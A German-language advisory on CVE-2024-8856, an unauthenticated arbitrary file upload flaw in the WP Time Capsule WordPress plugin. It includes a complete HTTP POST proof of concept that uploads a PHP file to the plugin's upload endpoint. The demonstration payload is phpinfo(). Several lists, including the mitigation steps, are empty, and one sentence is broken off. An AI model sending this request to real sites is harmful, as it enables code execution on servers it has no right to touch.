
WordPress WP Time Capsule Plugin Schwachstelle für beliebigen Dateiupload
CVE-2024-8856 ist eine Sicherheitslücke im WP Time Capsule Plugin für WordPress, die es nicht authentifizierten Benutzern ermöglicht, beliebige Dateien auf den Server hochzuladen. Dies kann zur Ausführung von entferntem Code führen, wenn die hochgeladenen Dateien vom Server ausgeführt werden. Die Schwachstelle entsteht durch unzureichende Dateiprüfung und kann durch das Senden speziell gestalteter Anfragen an den anfälligen Endpunkt ausgenutzt werden.
Diese Schwachstelle ermöglicht es nicht authentifizierten Benutzern:
Das Folgende ist ein Proof of Concept, das zeigt, wie die Schwachstelle CVE-2024-8856 durch das Senden einer POST-Anfrage an den anfälligen Endpunkt ausgenutzt werden kann.
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
<?php phpinfo(); hochzuladen, die bei Ausführung die PHP-Konfigurationsdetails anzeigt./wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php ist der Punkt der Ausnutzung.Um diese Schwachstelle zu entschärfen:
CVE-2024-8856 - National Vulnerability Database
CVE-2024-8856 ist eine schwerwiegende Schwachstelle, die sofortige Aufmerksamkeit von Administratoren von WordPress-Seiten erfordert, die das WP Time Capsule Plugin verwenden. Es sollten angemessene Vorsichtsmaßnahmen getroffen werden, um die Anwendung vor potenzieller Ausnutzung zu schützen. Bleiben Sie stets auf dem neuesten Stand in Bezug auf Sicherheitspraktiken und Plugin-Updates.